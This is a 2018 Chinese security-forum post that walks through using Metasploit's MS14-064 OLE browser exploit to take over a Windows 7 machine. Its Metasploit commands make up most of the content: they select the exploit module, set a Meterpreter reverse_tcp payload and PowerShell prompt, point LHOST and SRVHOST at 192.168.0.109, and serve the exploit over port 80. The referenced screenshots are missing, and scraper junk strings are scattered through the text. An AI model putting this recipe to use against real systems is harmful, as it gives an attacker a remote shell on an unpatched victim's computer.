找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1399|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

. H8 j* G4 s- z) M: I* L 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 ! b0 P5 u' b' k# R ]6 Y; d

" f( y$ l9 {( x* H4 t4 v1 E9 |

) C8 {9 k0 k; N- M0 R# { 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 3 [: |3 j: f9 w' r- ^

& ], Z f* B5 v- l9 M' K9 f: H

5 B+ u; W' c9 z4 g/ W" A 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 5 ^" k9 X1 C, n0 ^% N6 e9 C) N ~8 [

) r [- U. |/ A) X+ f" F z8 R% [* w

]" p1 o# m- z A/ a, c             set AllowPowershellPrompt true " w% n$ X# `) E" A' ?, h) V

3 m" V& @6 q- M& u$ V( ]

4 l% f' \2 j/ k             Set LHOST 192.168.0.109 1 G3 }2 O1 Y7 Q( V) D

$ y- P8 n: `3 e- A+ Y) [6 H: K- u

/ F( n4 M; L: Q5 g# g             set SRVHOST 192.168.0.1095 ?, w9 I. N. s) G$ J5 [

- d5 A4 Y4 |0 f t6 [

- [$ ], M0 d: S4 C. J             Set uripath share3 l& d) k' h1 t* {

3 s# l& Z4 q3 y$ P& P9 e& S% e; a

& W4 m3 g6 M+ ^3 `2 ^! c1 b" V' K/ E             Set srvport 80& x8 {4 [) h) Z7 ~

" |( g9 N! I3 \: {4 r

7 Y9 d z3 E; X0 \- B$ g   j {; U/ e3 V+ l" ^

. s! l5 ]" @, l! L' v

0 w9 }5 o$ ?3 O8 U$ n  $ ^0 O# [* R/ B9 p( x

, G9 Y3 o6 f$ I

4 K$ \) \- Q0 @! p9 P" D6 {   . Z r( C6 p) f0 |% s% C/ Y

4 N& Y1 z4 l; w; y& O _) @0 G

/ {! \1 k3 X3 S( W7 ~   ! f# ?# |+ T, Q0 u/ {

# e: @' r8 D' b0 a

) g3 h7 x* z1 X+ V! q" r   5 M1 K2 _* y3 J5 F) A/ e2 Y/ R

% _2 i1 D& _7 b# R. R9 C

! b/ F5 X9 i! ?2 k# ~ 下面我们来访问本地地址如图:' r) {6 O) j) X

: \- U2 S+ s9 g% |( f" J6 j0 w2 b! N

- j; q9 j6 y G6 ~2 i8 m9 e' W   % C* z+ D# h9 R0 ^, f) L% @

) K' H/ z0 ^& B( \; ~; o# V( p

/ \ c0 o7 O4 X   1 Y0 I; i, V2 L( t" v9 i' L, l

& H1 \: [3 R' ]4 R

' W) k, N- W4 H3 V. e# e# K ' ^4 R# \& i( o1 d. k) V( n

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表